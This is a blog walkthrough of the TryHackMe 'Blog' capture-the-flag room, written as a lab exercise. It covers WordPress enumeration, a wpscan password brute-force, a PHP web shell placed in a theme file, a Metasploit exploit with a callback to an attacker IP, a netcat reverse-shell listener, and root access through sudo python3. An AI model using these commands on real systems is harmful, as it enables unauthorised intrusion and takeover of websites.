Welcome to Notes Time πŸ‘‹

Notes Time is your trusted platform for free study notes, tutorials, and guides designed to make learning simple, clear, and effective.

Whether you’re exploring Full Stack Web Development, mastering Cyber Security, or diving into Digital Marketing β€” we’ve got you covered with easy-to-understand content and practical examples.

Learn smarter, grow faster, and upskill with Notes Time β€” your digital study companion for tech and career success.

Subscribe to our newsletter and get our newest updates right on your inbox.

TryHackMe BLOG Room – Full Walkthrough

By Himanshu Shekhar Β· 10 Feb 2026

TryHackMe BLOG Room – Full Walkthrough

πŸ§ͺ TryHackMe – BLOG Room (Full Lab Walkthrough)

⚠️ Educational Use Only: This walkthrough is strictly for authorized platforms like TryHackMe. Do not attempt on real-world systems.

🎯 Goal

  • βœ” Initial Access
  • βœ” User Flag
  • βœ” Root Flag

πŸ”Ή STEP 1: Start the Machine & Identify IP

Start the machine and note the assigned IP address.

ping Target IP
export IP=10.10.x.x

πŸ”Ή STEP 2: Network Enumeration

nmap -sC -sV -oN nmap.txt $IP

Expected Open Ports:

  • 22/tcp – SSH
  • 80/tcp – HTTP
πŸ’‘ Web service on port 80 becomes the main attack surface.

πŸ”Ή STEP 3: Website Enumeration

Visit the website in a browser.

http://<IP>

The site appears to be a WordPress blog.


πŸ”Ή STEP 4: Directory Bruteforce

gobuster dir -u http://$IP -w /usr/share/wordlists/dirb/common.txt

Important Directories:

  • /wp-admin
  • /wp-login.php
  • /wp-content
βœ… WordPress CMS confirmed

πŸ”Ή STEP 5: WordPress User Enumeration

wpscan --url http://$IP --enumerate u
  • Discovered User: admin

πŸ”Ή STEP 6: WordPress Password Bruteforce


wpscan --url http://$IP \
--usernames admin \
--passwords /usr/share/wordlists/rockyou.txt
                         
🚨 Credentials Found: admin : <password>

πŸ”Ή STEP 7: Login to WordPress Admin Panel

http://<IP>/wp-admin

πŸ”Ή STEP 8 (Option A): Remote Code Execution (Theme Editor)

Navigate to Appearance β†’ Theme Editor β†’ 404.php

<
?php 
     system(\$_GET['cmd']); 
?>
                         

OR

πŸ”Ή STEP 8 (Option B): Exploitation Using Metasploit

Instead of manual exploitation, Metasploit can be used to gain an initial shell.

⚠️ This method is optional and shown for learning purposes only.
msfconsole

use exploit/multi/http/wp_crop_rce

# Target machine IP (victim)
set RHOSTS <TARGET_IP>

# WordPress credentials
set USERNAME admin
set PASSWORD <password>

# Attacker machine IP (your system / VPN IP)
set LHOST <ATTACKER_IP>

run
                         

πŸ”Ή After Exploitation: Get a Stable Shell

sessions
sessions -i 1
shell
bash -i
python -c 'import pty; pty.spawn("/bin/bash")'

or simply:

bash -i
whoami
πŸ’‘ Successful exploitation results in a Meterpreter shell, which can then be converted to a standard system shell.

πŸ”Ή STEP 9: Obtain Reverse Shell

nc -lvnp 4444

Trigger the payload from the browser.

πŸŽ‰ Shell obtained as www-data

πŸ”Ή STEP 10: Stabilize Shell


# Spawn a proper TTY shell
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Fix terminal display issues
export TERM=xterm
                         

πŸ”Ή STEP 11: Capture User Flag


cd /home
ls
cd <user>
cat user.txt
                         
βœ… User Flag Captured

πŸ”Ή STEP 12: Privilege Escalation Enumeration

sudo -l
πŸ’‘ NOPASSWD permission on python3 detected.

πŸ”Ή STEP 13: Root Access


sudo python3 -c 'import os; os.system("/bin/bash")'
whoami
                         

πŸ”Ή STEP 14: Capture Root Flag


cd /root
cat root.txt
                         
🎯 Root Flag Captured

🧾 Key Takeaways

  • βœ” Enumeration is critical
  • βœ” Weak credentials enable compromise
  • βœ” Misconfigured sudo leads to root access
  • βœ” Defense relies on patching and hardening
βœ… This lab demonstrates a full real-world attack chain in a controlled environment.
πŸ“š

πŸ“š Related Blogs

Privilege Escalation via Writable /etc/passwd & Shadow Abuse

By Himanshu Shekhar Β· 12 Feb 2026

Privilege Escalation via Writable /etc/passwd & Sh...

Privilege Escalation via Docker / Container Escapes

By Himanshu Shekhar Β· 12 Feb 2026

Privilege Escalation via Docker / Container Escape...

Privilege Escalation via Weak File Permissions & Group Membership Abuse

By Himanshu Shekhar Β· 12 Feb 2026

Privilege Escalation via Weak File Permissions & G...

Privilege Escalation via Linux Capabilities

By Himanshu Shekhar Β· 10 Feb 2026

Privilege Escalation via Linux Capabilities (Conce...

Privilege Escalation via SUID (Conceptual Guide)

By Himanshu Shekhar Β· 10 Feb 2026

Privilege Escalation via SUID (Conceptual Overview...

DC-1 VulnHub: Drupal 7 Exploitation and SUID Privilege Escalation

By Himanshu Shekhar Β· 10 Feb 2026

DC-1 VulnHub Walkthr...

Privilege Escalation via Misconfigured NFS

By Himanshu Shekhar Β· 10 Feb 2026

Privilege Escalation via Misconfigured NFS (Concep...

Privilege Escalation via PATH Variable Manipulation

By Himanshu Shekhar Β· 10 Feb 2026

Privilege Escalation via PATH Variable Manipulatio...

Privilege Escalation via Cron Jobs

By Himanshu Shekhar Β· 10 Feb 2026

Privilege Escalation via Cron Jobs...

Active Directory Domain Services – Setup Windows Server Conceptual

By Himanshu Shekhar Β· 10 Feb 2026

πŸ› οΈ Step-by-Step: Set...

Privilege Escalation via Kernel Vulnerabilities

By Himanshu Shekhar Β· 10 Feb 2026

Privilege Escalation via Kernel Vulnerabilities...

Privilege Escalation via Sudo Misconfiguration

By Himanshu Shekhar Β· 10 Feb 2026

Privilege Escalation via Sudo (Conceptual Overv...

+